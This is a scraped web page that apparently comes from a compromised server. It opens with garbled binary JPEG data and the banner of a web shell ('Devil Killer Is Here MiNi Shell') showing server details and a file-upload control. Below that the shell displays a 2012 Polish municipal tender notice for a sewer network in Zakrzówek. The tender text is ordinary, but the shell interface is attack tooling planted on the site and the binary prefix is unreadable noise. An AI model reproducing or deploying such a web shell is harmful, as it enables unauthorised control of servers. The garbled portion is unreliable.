JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120802/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120802/283508-N-2012.html

<p class="kh_header"><b>Zakrzówek: Budowa sieci kanalizacji sanitarnej w miejscowości Bystrzyca, Zakrzówek, Zakrzówek Wieś, Sulów (aglomeracja Bystrzyca)</b><br>
<b>Numer ogłoszenia: 283508 - 2012; data zamieszczenia: 02.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Zakrzówek , ul. Żeromskiego 24, 23-213 Zakrzówek, woj. lubelskie, tel. 81 8215002, faks 81 8215002.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zakrzowek.lubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa sieci kanalizacji sanitarnej w miejscowości Bystrzyca, Zakrzówek, Zakrzówek Wieś, Sulów (aglomeracja Bystrzyca).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest budowa sieci kanalizacji sanitarnej z przykanalikami i pompowniami ścieków mająca na celu odprowadzanie ścieków bytowo-gospodarczych z gospodarstw domowych w miejscowościach Bystrzyca, Zakrzówek, Zakrzówek-Wieś i Sulów do oczyszczalni ścieków położonej w miejscowości Bystrzyca. Inwestycja podzielona została na dwa etapy. W pierwszym etapie skanalizowane zostaną miejscowości: Bystrzyca, Majorat i Zakrzówek ul. Wójtowicza i Sienkiewicza, a także przyległa część wsi Majdan Grabina. Drugi etap obejmuje miejscowości: Zakrzówek Wieś i Sulów. Zamówienie obejmuje budowę kanalizacji ciśnieniowej z pompowniami przydomowymi wyposażonymi w pompy wyporowe charakteryzujące się niewielką zależnością wydajności od wysokości podnoszenia. Pompy te posiadają rozdrabniacz i silnik jednofazowy o mocy 800 W.
Część zabudowy położonej w Zakrzówku przy ul. Sienkiewicza na naturalnym spadku terenu przewidziano skanalizować systemem grawitacyjnym.
Projektowana sieć kanalizacyjna będzie składać się z następujących elementów :
-pompownie przydomowe z obudową z polietylenu wyposażone w pompy wyporowe. Pompa musi być specjalnie zaprojektowana do stosowania w pompowniach przydomowych ścieków sanitarnych, oferowana jako całość, z pionowo umieszczonym rotorem, napędzana przez silnik elektryczny, dostosowana do pompowania ścieków sanitarnych z zawartością części stałych, typu śrubowo - wyporowego, z jednym uszczelniaczem mechanicznym. Rotor musi być wykonany ze stali nierdzewnej. Rotory z powłokami galwanicznymi nie będą akceptowalne ze względu na tendencję do odpadania powłoki. Stator musi być wykonany ze specjalnego elastomeru etylenowo-propylenowego który charakteryzuję się dużą odpornością na czynniki fizyczne i chemiczne zawarte w ściekach sanitarnych. Buna-N nie będzie akceptowane jako materiał statora ponieważ nie posiada odpowiednich właściwości odpornościowych. 
Rozdrabniacz musi być umieszczony bezpośrednio pod elementami pompującymi, napędzany bezpośrednio przez jednoelementowy wał silnika. Wirnik rozdrabniacza musi byś umocowany na wale za pomocą połączenia gwintowego. Rozdrabniacz typu obrotowego, z nieruchomym pierścieniem rozdrabniającym i umieszczonym centralnie napędzanym wirnikiem, wyposażonym w dwie sztaby tnące w utwardzonej stali nierdzewnej 400 (wg. ASTM). Rozdrabniacz powinien być umieszczony tak aby części stałe unoszone były do niego w kierunku pionowym do góry. Max. prędkość ścieków przepływających przez rozdrabniacz nie może przekroczyć 1,20 m/s. Wlot pompy musi posiadać średnicę przynajmniej 12,5 cm. Mechanizm tnący rozdrabniacza nie może obracać się z prędkością większą niż 1500 obr/min.
Silnik zastosowany do pomp musi posiadać silnik moc max. 0,8 kW. Obroty max. 1435 obr/min., zasilania 230 V, 50 Hz, 1 faza, uzwojenie klatkowe, rozruch pojemnościowy, łożyska kulowe, komora wirnika bezolejowa, moment obrotowy przy rozruchu: 6,2 Nm, maksymalny prąd rozruchu nie przekraczający 30 A (impuls). Zabezpieczenie przed przeciążeniem lub zatrzymaniem wirnika za pomocą wyłącznika termicznego o samoczynnym ponownym załączeniu wbudowanego w silniku.
Pompa musi posiadać uszczelniacz mechaniczny zapobiegający przeciekom z pompy do silnika. Uszczelniacz musi posiadać nieruchomą część ceramiczną i część obrotową wykonaną z węglika, z płaszczyznami styku precyzyjnie przylegającymi i dociskanymi sprężyną ze stali nierdzewnej.
Zbiornik musi być wykonany z polietylenu o wysokiej gęstości (HDPE). Ściana wewnętrzna powinna być gładka, aby ułatwić samooczyszczenie zbiornika. Odcinki z pojedynczą ścianą muszą mieć grubość najmniej 6,3 mm. Wszystkie łączenia powstałe w trakcie produkcji zbiornika muszą być spawane termicznie i przejść próbę ciśnieniową. Zbiornik musi posiadać uszczelkę wlotową do rury PCW O160 mm. Zbiornik musi posiadać łatwe regulowanie wysokości zbiornika o wymiar będący wielokrotnością nie więcej niż 10,5 cm bez stosowania klejów lub past uszczelniających. Wszystkie przejścia przez ściany zbiornika muszą być wykonane i przetestowane fabrycznie.
Wszystkie rury i złączki na rurociągu tłocznym muszą być wykonane ze stali nierdzewnej 304 (wg. ASTM), polipropylenu, EPDM lub PCW. Końcówka węża wylotowego musi posiadać zawór odcinający i złączkę PN 12,5 umożliwiającą szybką instalację i wyjęcie pompy.
Pompa musi posiadać szybkozłącze elektryczne, obejmujące wszystkie przewody sygnałowe i zasilające. Kabel pompy powinien posiadać integralny przewód odpowietrzający obudowę pompy.
Wylot pompy musi być wyposażony w zawór napowietrzający, zamontowany fabrycznie, typu klapowego, z częściami ruchomymi wykonanymi ze stali nierdzewnej 300 (wg. ASTM) i syntetycznego elastomeru zbrojonego włókniną dla zapewnienia odporności na korozję. Zawias musi być niemetalowy i zapewnić maksymalny zakres ruchu klapy oraz prawidłowe działanie nawet przy bardzo małych ciśnieniach. Obudowa powinna być wykonana metodą wtryskową z żywicy termoplastycznej zbrojonej włóknem szklanym. Otwory i trójniki w rurze wylotowej nie będą akceptowane.
Rurociąg tłoczy w pompowni musi posiadać fabrycznie zamontowany zawór zwrotny typu klapowego. Zawór powinien zapewniać całkowicie otwarty przelot w pozycji otwartej i musi powodować spadek ciśnienia (opory miejscowe) w pozycji otwartej nie większy niż 0,16 m sł. wody przy maksymalnym nominalnym przepływie z pompy. Części ruchome wykonane ze stali nierdzewnej 300 (wg. ASTM) i syntetycznego elastomeru zbrojonego włókniną. Zawias musi być niemetalowy i zapewnić maksymalny zakres ruchu klapy oraz szczelne zamknięcie zaworu nawet przy bardzo małych ciśnieniach wstecznych. Każda pompownia podłączona do kolektora tłocznego musi również posiadać dodatkowy, osobny zawór zwrotny, zgodny z powyższą specyfikacją, zainstalowany na przyłączu ciśnieniowym między pompownią a przyłączem.   
Pompownia musi posiadać łatwo wyjmowany, integralny zespół, a w przypadku pompowni pośrednich, dwa zespoły, w skład których wchodzą: pompa, silnik, rozdrabniacz, układy sterujące silnikiem, zawór zwrotny, zawór napowietrzający, szybkozłącze elektryczne i kabel. Wodoszczelność zespołu musi być potwierdzona przez próbę ciśnieniową 100% egzemplarzy przy ciśnieniu co najmniej 0,34 bar.
-przykanaliki grawitacyjne z rur PVC 160 mm odprowadzające ścieki z budynku do komory pompowni przydomowej;
-przewody kanałów bocznych odprowadzających ścieki od pompowni do kolektora kanalizacji ciśnieniowej z rur PE-HD SDR 11 o średnicy zewn. 40 mm .
-przewody główne kolektora tłocznego kanalizacji ciśnieniowej z rur PE-HD SDR 11 o średnicach zewn. 40 - 200 mm.
Zastosowane przez wykonawcę rury muszą posiadać wszelkie atesty, certyfikaty i dopuszczenia dotyczące układania rur bez podsypki i zasypki piaskowej oraz spełniać wymogi odpowiadające polskim normom. 
Rury muszą posiadać udokumentowane wyniki badań wyrobu gotowego, a nie jedynie granulatu potwierdzających te właściwości, tj. podwyższoną odporność na naciski punktowe i powolną propagację pęknięć oraz podwyższoną odporność na skutki zarysowań, zgodnych ze specyfikacją PAS 1075:2009-4. Oznacza to że należy okazać oddzielne certyfikaty zgodności z PAS 1075 dla każdej z grup wymiarowych zastosowanych rur. 
Poza certyfikatem zgodności z PAS 1075:2009-4 wymagana jest Aprobata Techniczna ITB potwierdzająca przydatność w technikach bezwykopowych oraz możliwości montażu bez obsypki i podsypki piaskowej, metodami tradycyjnymi i wąsko wykopowymi, jak również możliwość stosowania do bezwykopowych renowacji i wymiany wodociągów oraz Aprobata Techniczna IBDiM z zapisem o możliwości układania rur w przewiercie sterowanym bez rury osłonowej. W/w aprobaty muszą być wydane na podstawie badań gotowego wyrobu, a nie granulatu.
Rury powinny pochodzić od jednego producenta posiadającego zintegrowany system zarządzania jakością i środowiskiem według norm ISO 9001 i ISO 14001, z poświadczeniem wdrożenia przez certyfikat niezależnej instytucji.      

Inwestycja obejmować będzie obszar:
Etap  I:
-zadanie 3  w Bystrzycy (strona zachodnia)  - od działki Nr 944/1 do działki Nr 147
-zadanie 4  w Bystrzycy (strona wschodnia) - od działki Nr 697do działki Nr442/1
-zadanie 5  w Zakrzówku ul. Wójtowicza - od działki  Nr 902 do działki  Nr 944,
-zadanie 6 w Zakrzówku ul. Sienkiewicza - od działki Nr 966/1 do działki Nr 1027 i od działki Nr 895 do działki Nr 879.
Etap II:
-zadanie 1 w Zakrzówku od działki Nr 367 przy ul. Strażackiej do działki Nr 771w Zakrzówku-Wsi i od działki Nr 387 do działki Nr 423/2 w Zakrzówku -Wsi,
-zadanie 2 w Zakrzówku -Wsi od działki Nr 933 do działki Nr 1046,
-zadanie 3 w Zakrzówek- Wsi (Rudy) od działki Nr 1046 do działki Nr 45,
-zadanie 4 w Sulowie (strona zachodnia) od działki Nr 21 do działki Nr 786, i w Sulowie (strona wschodnia) od działki Nr 511 do działki Nr 1115,
-zadanie 5 w Sulowie (strona zachodnia) od działki Nr 239/3 do działki Nr 697,
-zadanie 6 w Sulowie (strona wschodnia) od działki Nr 774 do działki Nr 1345.

Długość wybudowanej sieci kanalizacji sanitarnej - około 47 258 m
Liczba wybudowanych przepompowni ścieków - 471 szt.

2. Podstawę wyceny i wykonania przedmiotu zamówienia stanowią:
1)specyfikacje techniczne wykonania i odbioru robót - projekt techniczny;
2)Przedmiary robót;
3)niniejsza specyfikacja istotnych warunków zamówienia i wizja w terenie;
3.Planowany harmonogram robót:
1) Kanalizacja sanitarna północno-zachodnia część wsi Bystrzyca (Etap I, Zadanie III) - I kwartał 2013 roku, 
2) Kanalizacja sanitarna północno-wschodnia część wsi Bystrzyca (Etap I, Zadanie IV) - II kwartał 2013 roku, 
3) Kanalizacja sanitarna Zakrzówek ul. Wójtowicza (Etap I, Zadanie V) - III kwartał 2013 roku,  
4) Kanalizacja sanitarna Zakrzówek ul. Sienkiewicza (Etap I, Zadanie VI) - III kwartał 2013 roku
5) Kanalizacja sanitarna Zakrzówek Wieś lewa strona rzeki Bystrzyca (Etap II, Zadanie I) - IV kwartał 2013 roku 
6) Kanalizacja sanitarna Zakrzówek wieś prawa strona rzeki Bystrzyca (Etap II, Zadanie II) - I kwartał 2014 roku
7) Kanalizacja sanitarna Zakrzówek Wieś-Rudy (Etap II, Zadanie III) - I kwartał 2014 roku
8) Kanalizacja sanitarna Sulów (do szkoły) (Etap II, Zadanie IV) - II kwartał 2014 roku
9) Kanalizacja sanitarna Sulów lewa strona rzeki Bystrzycy (Etap II, Zadanie V) - III kwartał 2014 roku
10) Kanalizacja sanitarna Sulów  prawa strona rzeki Bystrzycy (Etap II, Zadanie VI) - IV kwartał 2014 roku
4. Zaleca się, aby Wykonawca dokonał wizji lokalnej w terenie, gdzie będą realizowane roboty będące przedmiotem zamówienia oraz zdobył wszelkie informacje, które mogą być konieczne do przygotowania oferty i podpisania umowy. 
5. Wymagany okres gwarancji na wykonane roboty - minimum 5 lat..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Budowa kanałów bocznych wraz z pompowniami przydomowymi z obudową z polietylenu wyposażone w pompy wyporowe w ilości zależnej od wniosków mieszkańców o podłączenie do sieci kanalizacyjnej.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.10-9, 45.23.24.11-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.11.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każda oferta musi być zabezpieczona wadium w wysokości 250 000,00 zł (słownie: dwieście pięćdziesiąt tysięcy złotych złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku dotyczącego posiadania uprawnień do wykonania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania należy przedłożyć oświadczenie stanowiące załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli w tych latach wykonawca wykonał: co najmniej dwa zadania o wartości min. 8,0 mln zł (brutto) każde w zakresie budowy kanalizacji sanitarnej grawitacyjno-tłocznej w ramach których wykonano minimum 350 szt. przydomowych pompowni ścieków dla każdego zadania. (zał. nr 3). 
Należy załączyć dokumenty potwierdzające, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (referencje)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący dysponowania odpowiednim potencjałem technicznym oceniony zostanie na podstawie oświadczenia (zał. nr 4 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony w przypadku, gdy Wykonawca wykaże się dysponowaniem co najmniej 1 osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności  instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych bez ograniczeń oraz 1 osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący sytuacji ekonomicznej i finansowej oceniony zostanie na podstawie:
a)	Ocena spełnienia warunku dotyczącego średniego rocznego przychodu netto ze sprzedaży nastąpi na podstawie załączonego przez wykonawcę rachunku zysków i strat a w przypadku wykonawców nie zobowiązanych do sporządzenia sprawozdania finansowego innych dokumentów określających przychody netto za sprzedaży - za okres ostatnich trzech lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres.
b)	Ocena spełniania warunku dotyczącego posiadania środków finansowych nastąpi na podstawie załączonych przez wykonawcę informacji z banku lub spółdzielczej kasy oszczędnościowo - kredytowej, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,                   w którym posiada rachunek, potwierdzającą wysokość posiadanych przez wykonawcę środków finansowych lub posiadaną przez wykonawcę zdolność kredytową w wysokości określonej powyżej.
c)	Ocena spełniania warunku dotyczącego posiadania ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia nastąpi na podstawie załączonej przez wykonawcę opłaconej polisy, a w przypadku jej braku inny dokument potwierdzający, że jest on ubezpieczony od odpowiedzialności cywilnej  w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w całości, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

